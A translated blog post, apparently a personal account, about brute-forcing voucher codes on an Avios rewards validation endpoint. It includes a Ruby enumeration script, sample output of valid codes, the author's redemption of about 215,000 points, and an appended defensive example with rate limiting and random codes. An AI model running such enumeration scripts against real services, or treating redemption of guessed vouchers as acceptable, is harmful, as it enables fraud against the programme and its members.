
How I found a bug in the Avios Travel system and got thousands of valid points for aviation miles



If you are like me, you have probably thought about travelling the world in first class for free, watched the YouTube videos and know about the people who do it.

This is a story about how I found a bug in the Avios Travel rewards programme that lets you fulfil this dream*.

A couple of weeks ago I flew to New York. Since it was my first visit to the States and my first transatlantic flight, I was full of enthusiasm. You would have asked yourself the same questions:

Can I get into first class? How do I do it? What do I say? How do I not look like a freak when making such a request?

Alas, only when you get to the airport do you realise that the check-in process is mostly automated. Your chances of asking a beautiful girl at the front desk for a free upgrade are vanishingly small. But it made me think: how do people do it?


Aer Lingus Aer Club


British Airways Executive Club

Welcome to airline loyalty programs.

Nothing extraordinary. People have known about loyalty programmes for a long time. But Avios has something unique. So what is it?

Avios points are a shared reward currency accepted by Aer Lingus, British Airways, Flybe, Iberia, kulula.com and Meridiana. By collecting Avios points on flights, hotels and car rentals, you can choose reward flights to hundreds of destinations around the world.

After registering with the Aer Lingus and British Airways loyalty programmes, I came across this site. It is simply a form that lets a customer enter their membership details, some personal data and a reward code that was sent to them. This is where it gets interesting.

Implementation



Code example already used

Two things immediately caught my attention. First, it was clear from the form that a simple regular-expression check is performed on the frontend to verify the format of the code. Second, while you are entering the code, the page immediately shows whether it is valid. This is done through an AJAX request.

Chrome's developer tools showed that the network requests to check the code go to this URL. Then a thought occurred to me. If I know the format of the codes and I know the endpoint that checks them, can I generate 1000 random codes in that format and write a script to iterate over them and check each one?

The answer is yes I can.

```ruby
#!/usr/bin/ruby
require 'httparty'
require 'json'    # needed for JSON.parse
require 'byebug'

url = "https://www.aviosvouchers.com/en/Collect/ValidateCode"
# Code format seen in the frontend check: [a-zA-Z]{3}[0-9]{3}[a-zA-Z]{1}

puts "Running Script..."

# codes.txt holds one candidate code per line (first tab-separated column)
File.open('codes.txt', 'r').each_line do |line|
  data = line.split(/\t/)
  code = data.first.chomp                      # strip the trailing newline
  request = HTTParty.post(url, body: { code: code.to_s })
  json = JSON.parse(request.body)
  puts "#{json} — #{code}" if json['value'] > 0  # only print codes the endpoint reports as valid
  sleep(0.5)                                   # short pause between requests
end

puts "Finished Running Script."
```

This script reads the list of generated codes from a text file (you can generate codes from your own regular expression, or use something like a text-from-regex tool). It then sends a POST request to the specified URL. If we get a valid response (the value attribute is greater than zero), the response is printed to the CLI, and after a short pause the next request is sent.

What was the result? A list of VALID CODES! (For obvious reasons, I changed the actual values below.)

```
{"status"=>"ok", "message"=>"Valid", "genericVoucherCode"=>"5007652532665", "value"=>10000.0, "itemId"=>nil} — JCX328W
{"status"=>"ok", "message"=>"Valid", "genericVoucherCode"=>"7186731101111", "value"=>10000.0, "itemId"=>nil} — MYS272Y
{"status"=>"ok", "message"=>"Valid", "genericVoucherCode"=>"7409825562501", "value"=>1500.0, "itemId"=>nil} — XSL523V
{"status"=>"ok", "message"=>"Valid", "genericVoucherCode"=>"2504822562501", "value"=>1500.0, "itemId"=>nil} — SYZ436G
{"status"=>"ok", "message"=>"Valid", "genericVoucherCode"=>"8476533219878", "value"=>20000.0, "itemId"=>nil} — PEG924R
{"status"=>"ok", "message"=>"Valid", "genericVoucherCode"=>"4318675747654", "value"=>500.0, "itemId"=>nil} — AHC939A
{"status"=>"ok", "message"=>"Valid", "genericVoucherCode"=>"6509522562501", "value"=>1500.0, "itemId"=>nil} — JGZ792E
{"status"=>"ok", "message"=>"Valid", "genericVoucherCode"=>"5904736483764", "value"=>500.0, "itemId"=>nil} — DMB882D
```


After several days of running the script, I had received a lot of valid codes, and after adding them to my account, it looked like this.


BA Account Screenshot

215,010 Avios points. Yes, that is a lot. So much that I could fly from London to Indonesia in first class for only 500 pounds. Hope awoke in me that my dreams would finally come true.

But the dreams did not come true


After a while I began to doubt the legality of such actions. If I booked a flight and used these points, what would the consequences be? Common sense eventually won, so I decided to notify Avios about the problem before publishing this information. But it seems they fixed the bug before I had time to report it.


The code verification endpoint is no longer available.

The site no longer checks codes instantly. Now, for verification, you have to submit the whole form from the page. In addition, they seem to have noticed me and banned my account...

(They also banned my Aer Lingus account, so I didn't have time to take a screenshot there.)


Banned BA Account

Finally


What technical conclusions can be drawn from this? How could the system have been built from the start to avoid the problem? In fact, it is not difficult: you just need to limit the number and/or frequency of requests to the endpoint, and make the codes non-deterministic so that they are harder to guess.

  1. Rate limiting of requests.
  2. Variable, non-deterministic codes.
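The two fixes above, applied to the kind of validation endpoint described earlier (a form whose code field is checked live via AJAX), as an added Ruby example. This is not code from the original post or from Avios, British Airways or Aer Lingus; `RateLimiter`, `VoucherValidator`, `generate_code` and `keyspace_bits` are hypothetical names, the issued-code hash stands in for a real voucher database, and the client address and attempt timings are constructed for the demo.

```ruby
require 'securerandom'

# Sliding-window limiter: at most `limit` validation attempts per client per `window` seconds.
# `now` is passed in so the logic can be exercised without sleeping; a real deployment
# would keep the counters in shared storage so every web node sees the same budget.
class RateLimiter
  def initialize(limit:, window:)
    @limit = limit
    @window = window
    @attempts = Hash.new { |h, k| h[k] = [] }
  end

  # true if the client still has budget in the current window, false otherwise.
  def allow?(client, now = Process.clock_gettime(Process::CLOCK_MONOTONIC))
    recent = @attempts[client].delete_if { |t| t <= now - @window }
    return false if recent.size >= @limit
    recent << now
    true
  end
end

# Bits of entropy in a fixed-template code. The page's [a-zA-Z]{3}[0-9]{3}[a-zA-Z]{1}
# format allows 52^4 * 10^3 strings, roughly 2^32.8: small enough that blind guessing
# keeps landing on live codes whenever many codes are in circulation.
def keyspace_bits(alphabet_sizes)
  alphabet_sizes.sum { |n| Math.log2(n) }
end

# Non-deterministic replacement: 26 symbols from a 32-symbol alphabet, i.e. 130 bits
# drawn from the OS CSPRNG, so guessing is hopeless however many codes exist.
CODE_ALPHABET = (('A'..'Z').to_a + ('2'..'7').to_a).freeze # no 0/O or 1/I confusion

def generate_code(length = 26)
  Array.new(length) { CODE_ALPHABET[SecureRandom.random_number(CODE_ALPHABET.size)] }.join
end

# The validation endpoint with the limiter in front of it. Every attempt, valid or
# not, spends the same budget, so enumeration stalls at `limit` guesses per window.
class VoucherValidator
  def initialize(issued, limiter)
    @issued = issued     # code => value; stands in for the voucher database
    @limiter = limiter
  end

  # Returns :rate_limited, :valid or :invalid.
  def validate(client, code, now = Process.clock_gettime(Process::CLOCK_MONOTONIC))
    return :rate_limited unless @limiter.allow?(client, now)
    @issued.key?(code) ? :valid : :invalid
  end
end

# Constructed scenario: one client (203.0.113.7, a documentation address) makes
# twelve guesses at one-second intervals against a limit of ten per minute.
def demo
  limiter = RateLimiter.new(limit: 10, window: 60)
  validator = VoucherValidator.new({ generate_code => 1500.0 }, limiter)
  outcomes = (1..12).map { |i| validator.validate('203.0.113.7', 'AAA000A', 1000.0 + i) }
  outcomes.tally # => { invalid: 10, rate_limited: 2 }
end

if __FILE__ == $PROGRAM_NAME
  puts "template keyspace: #{keyspace_bits([52, 52, 52, 10, 10, 10, 52]).round(1)} bits"
  puts "random code:       #{generate_code}"
  p demo
end
```

The limiter is keyed by client, so the budget should be tied to something the caller cannot cheaply rotate (an authenticated session rather than a bare IP where possible), and the same counter should also feed monitoring: a client that hits the limit repeatedly on this endpoint is exactly the signal the post describes being caught by.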

Finally, if someone from Avios, British Airways or Aer Lingus reads this, I would be very grateful if they unblocked my accounts. I would like to continue accumulating genuine reward points like any normal person.

*Addendum


I received a ton of messages on this topic, so let me be clear. I understand why people assume that I acted maliciously from the very beginning. In all sincerity I can assure you that this is not so, although many are unlikely to believe me. The fact that I used the codes I found has more to do with excitement than anything else.

Source: https://habr.com/ru/post/354538/

